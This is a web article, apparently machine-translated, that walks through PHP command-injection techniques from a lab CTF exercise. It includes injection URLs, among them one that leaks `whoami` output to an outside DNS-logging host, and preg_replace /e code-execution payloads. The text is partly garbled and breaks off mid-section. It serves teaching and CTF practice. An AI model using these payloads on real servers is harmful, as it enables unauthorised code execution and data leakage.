In addition to Weibo, there is also WeChat
Please pay attention
WeChat public account
Shulou
2025-04-07 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >
Share
Shulou(Shulou.com)06/01 Report--
In this issue, the editor will bring you about how to inject PHP code commands. The article is rich in content and analyzes and describes for you from a professional point of view. I hope you can get something after reading this article.
1. Antecedent
I saw an experiment like this in Hetian Lab today:
The topic is relatively friendly to Mengxin and belongs to the enlightening item. Students who have not yet come into contact with this kind of problem can give it a try and appreciate the charm injected by the command.
After I personally did it, I thought it would be better to summarize the recent command or code injection, so I had this article.
1. Common php command injection functions
Eval (), assert (), system (), preg_replace (), create_function, call_user_func, call_user_func_array,array_map (), backquotes, ob_start (), exec (), shell_exec (), passthru (), escapeshellcmd (), popen (), proc_open (), pcntl_exec ()
Second, background
1. Knowledge premise
I won't mention it any more here. I believe you are already familiar with these functions, and common ponies are in use.
two。 Topic actual combat
This is explained directly by the title of Hetian Lab.
See the source code given in the title:
Normal access
Http://localhost/web/hetian.php?ip=127.0.0.1
(23333 coding problem please ignore)
Is a regular ping command
We make an order injection.
Http://localhost/web/hetian.php?ip=|dir
Get echo
Let's change the routine and put this code on the server (linux).
Try:
Http://vps_ip/testsky/index.php?ip=`whoami`.2bub8m.ceye.io
You can receive an echo
And this kind of problem can be said to be common in CTF, and it is worth mastering.
3. Preg_replace ()
1. Knowledge premise
Consult the php manual
Mixed preg_replace (mixed $pattern, mixed $replacement, mixed $subject [, int $limit =-1 [, int & $count]])
Function: search for parts of the subject that match pattern and replace them with replacement.
Where it is mentioned in the error / exception:
Since PHP 5.5.0, when the "\ e" modifier is passed, an E_DEPRECATED error will be generated; from PHP 7.0.0, an E_WARNING error will be generated, and "\ e" will not work.
So it's this modifier that allows us to inject commands.
But what you need to know is:
The / e modifier is no longer supported in 7.0.0. Please use preg_replace_callback () instead.
5.5.0 / e modifier has been deprecated. Use preg_replace_callback () instead. See the documentation for more information about security risks from PREG_REPLACE_EVAL.
In practice, you need to see the php version clearly, which is no longer applicable after version 7. 0!
two。 Topic actual combat
Error_reporting (0)
$pattern = $_ GE [pat]
$replacement = $_ get [rep]
$subject = $_ ET[ sub]
If (isset ($pattern) & & isset ($replacement) & & isset ($subject))
{
Preg_replace ($pattern, $replacement, $subject)
}
Else
{
Die ()
}
Call method:
Preg_replace ("/ test/e", phpinfo (), "jutst test")
At this point phpinfo () will be executed
Because of the / e modifier, preg_replace executes the replacement parameter as PHP code
So the final payload:
? pat=/test/e&rep=phpinfo () & sub=jutst test
? pat=/test/e&rep=var_dump (`dir`) & sub=jutst test
You can see that the command was successfully injected!
4. Create_function ()
1. Knowledge premise
Consult the php manual
String create_function (string $args, string $code)
Function: a parameter passed from creating an anonymous function and returning a unique name
Look at an official example.
Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.
Views: 0
*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.
Continue with the installation of the previous hadoop.First, install zookooper1. Decompress zookoope
"Every 5-10 years, there's a rare product, a really special, very unusual product that's the most un
© 2024 shulou.com SLNews company. All rights reserved.